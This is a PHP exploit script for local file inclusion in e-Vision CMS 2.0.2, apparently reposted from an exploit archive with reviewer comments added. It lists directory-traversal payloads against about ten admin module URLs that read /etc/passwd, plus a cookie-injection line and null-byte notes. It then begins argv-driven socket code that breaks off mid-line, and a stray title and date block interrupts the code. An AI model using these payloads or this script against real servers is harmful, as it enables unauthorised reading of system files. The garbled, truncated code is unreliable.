1 <?php
2
3 error_reporting(0); // turns off all PHP error reporting, so warnings and notices from the code below are never shown
4 ini_set("default_socket_timeout",5); // 5-second default socket timeout; NOTE(review): this ini value governs stream-based sockets, the socket_create() socket used further down may not honour it - confirm
5
6
7
8
9 /*
10 e−Vision <= 2.0.2 Multiple Local File Inclusion Exploit
11 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
12 by athos − download http://sourceforge.net
13 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
14 Works with magic_quotes_gpc turned off (that setting was removed in PHP 5.4, so it cannot be relied on as a defence)
15
16
17 javascript: document.cookie="adminlang=../../../../etc/passwd";
18 modules/3rdparty/adminpart/add3rdparty.php?module=../../../../../../etc/passwd
19 modules/polling/adminpart/addpolling.php?module=../../../../../etc/passwd
20 modules/contact/adminpart/addcontact.php?module=../../../../etc/passwd
21 modules/brandnews/adminpart/addbrandnews.php?module=../../../etc/passwd
22 modules/newsletter/adminpart/addnewsletter.php?module=../../../../etc/passwd
23 modules/game/adminpart/addgame.php?module=../../../../etc/passwd
24 modules/tour/adminpart/addtour.php?module=../../../etc/passwd
25 modules/articles/adminpart/addarticles.php?module=../../../../etc/passwd
26 modules/product/adminpart/addproduct.php?module=../../../../etc/passwd
27 modules/plain/adminpart/addplain.php?module=../../../../../etc/passwd
28
29 ../../etc/passwd and nullbyte
30
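31 how to fix? addslashes($_GET['module']); would escape the null byte, but that isn't a good fix: "../" sequences still pass through, so the module name should be checked against a fixed list of known modules before it is used in an include path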
32
33
34 coded by me
35
36
37 */
38
39 $exploit = new Exploit; // the Exploit class is declared further down the file (line 49)
40 $domain = $argv[1]; // first command-line argument; its presence is not checked, and with error_reporting(0) a missing value yields null silently
41 $mymode = $argv[2]; // second command-line argument, handed to exploiting() below; also unchecked
42
43 $exploit−>starting(); // defined outside this excerpt; takes no arguments here
44 $exploit−>is_vulnerable($domain); // return value is discarded, so the next call runs whatever this reports (unless the method itself exits - not visible here)
45 $exploit−>exploiting($domain,$mymode); // receives both command-line values unvalidated
46
47
48
49 class Exploit
50 {
51 function http_request($host,$data)
52 {
eVision CMS 2.0.2 Multiple Local File Inclusion Exploit
StAkeR
11/07/2008
53
54 if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP))
55 {
56 echo "socket_create() error!\r\n";
57 exit;
58 }
59 if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
60 {
61 echo "socket_set_o